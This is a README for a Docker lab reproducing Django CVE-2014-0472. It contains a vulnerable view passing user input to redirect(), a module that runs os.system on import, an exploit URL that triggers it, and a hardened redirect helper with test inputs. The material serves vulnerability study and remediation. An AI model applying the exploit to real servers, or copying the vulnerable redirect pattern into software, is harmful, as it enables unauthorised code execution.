# CVE-2014-0472

Django unexpected code execution using reverse()
Use
```
docker-compose up -d
```
Access localhost:8083
Reference:
[https://www.djangoproject.com/weblog/2014/apr/21/security/](https://www.djangoproject.com/weblog/2014/apr/21/security/)
>
> 1. One or more views are present which construct a URL based on user input (commonly, a "next" parameter in a querystring indicating where to redirect upon successful completion of an action).
> 2. One or more modules are known to an attacker to exist on the server's Python import path, which perform code execution with side effects on importing.

In `tests.py`:
```python
import os

def evil_function():
    print("exploit successful")
    os.system("echo > /tmp/`whoami` ")
    return os.getuid()

# Runs at import time: importing app.tests is enough to execute evil_function()
evil = evil_function()
```
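In `views.py`:
```python
from django.http import HttpResponse
from django.shortcuts import redirect

def redirect_test(request):
    page = request.GET.get('page', None)
    if page is not None:
        # Vulnerable: user input reaches redirect(), which calls reverse() on it
        redirect(page)
    return HttpResponse("OK")
```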
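Use the `redirect()` function to trigger the evil function: `redirect()` hands the `page` value to `reverse()`, and importing `app.tests` runs `evil_function()` as a side effect.

Exploit URL: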
```
http://your-ip:8083/example?page=app.tests.evil
```

Exploited
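
A hardened counterpart to the `redirect_test` view above, as an added example that is not part of this repository: the `page` value is mapped to a local path and is never treated as a view name, so a dotted path cannot reach `reverse()`. The helper name `safe_redirect_target` and the `ALLOWED_NAMES` table are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: short names this app agrees to redirect to.
ALLOWED_NAMES = {"home": "/", "profile": "/accounts/profile/"}
DEFAULT_TARGET = "/"


def safe_redirect_target(page, allowed=ALLOWED_NAMES, default=DEFAULT_TARGET):
    """Map user input to a local path without ever treating it as a view name."""
    if not page:
        return default
    # Named targets come from a fixed table, so a dotted path such as
    # "app.tests.evil" is never resolved, and therefore never imported.
    if page in allowed:
        return allowed[page]
    # Backslashes and control characters are normalised differently by
    # browsers and parsers; refuse them outright.
    if any(ch in page for ch in "\\\r\n\t"):
        return default
    try:
        parts = urlsplit(page)
    except ValueError:  # e.g. malformed IPv6 literal
        return default
    # Only same-site absolute paths: no scheme, no host, single leading slash.
    if parts.scheme or parts.netloc:
        return default
    if not page.startswith("/") or page.startswith("//"):
        return default
    return page


if __name__ == "__main__":
    # Constructed sample inputs, including the PoC value from this README.
    for sample in ["app.tests.evil", "/dashboard?tab=1", "home",
                   "//attacker.example/x", "https://attacker.example/", None]:
        print(repr(sample), "->", safe_redirect_target(sample))
```

In the view, return `HttpResponseRedirect(safe_redirect_target(page))` instead of calling `redirect(page)`; `HttpResponseRedirect` uses the string as the `Location` value and does not call `reverse()`.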

```
[4.0K] /data/pocs/5f26c2347ae30a2b1e8a9a2fd158c4fc5f85b659
├── [ 143] docker-compose.yml
├── [ 481] Dockerfile
├── [4.0K] img
│   ├── [ 95K] exec_evil.png
│   ├── [9.0K] exploit.png
│   └── [ 12K] tmp_list.png
├── [1.1K] README.md
├── [ 32] requirements.txt
└── [4.0K] vuln
    ├── [4.0K] app
    │   ├── [ 63] admin.py
    │   ├── [ 81] apps.py
    │   ├── [ 0] __init__.py
    │   ├── [4.0K] migrations
    │   │   ├── [ 0] __init__.py
    │   │   └── [4.0K] __pycache__
    │   │       └── [ 152] __init__.cpython-37.pyc
    │   ├── [ 57] models.py
    │   ├── [ 213] tests.py
    │   └── [ 289] views.py
    ├── [4.0K] CVE-2014-0472
    │   ├── [ 403] asgi.py
    │   ├── [ 0] __init__.py
    │   ├── [2.5K] settings.py
    │   ├── [ 820] urls.py
    │   └── [ 403] wsgi.py
    ├── [120K] db.sqlite3
    ├── [ 661] manage.py
    └── [ 167] run.sh

6 directories, 23 files
```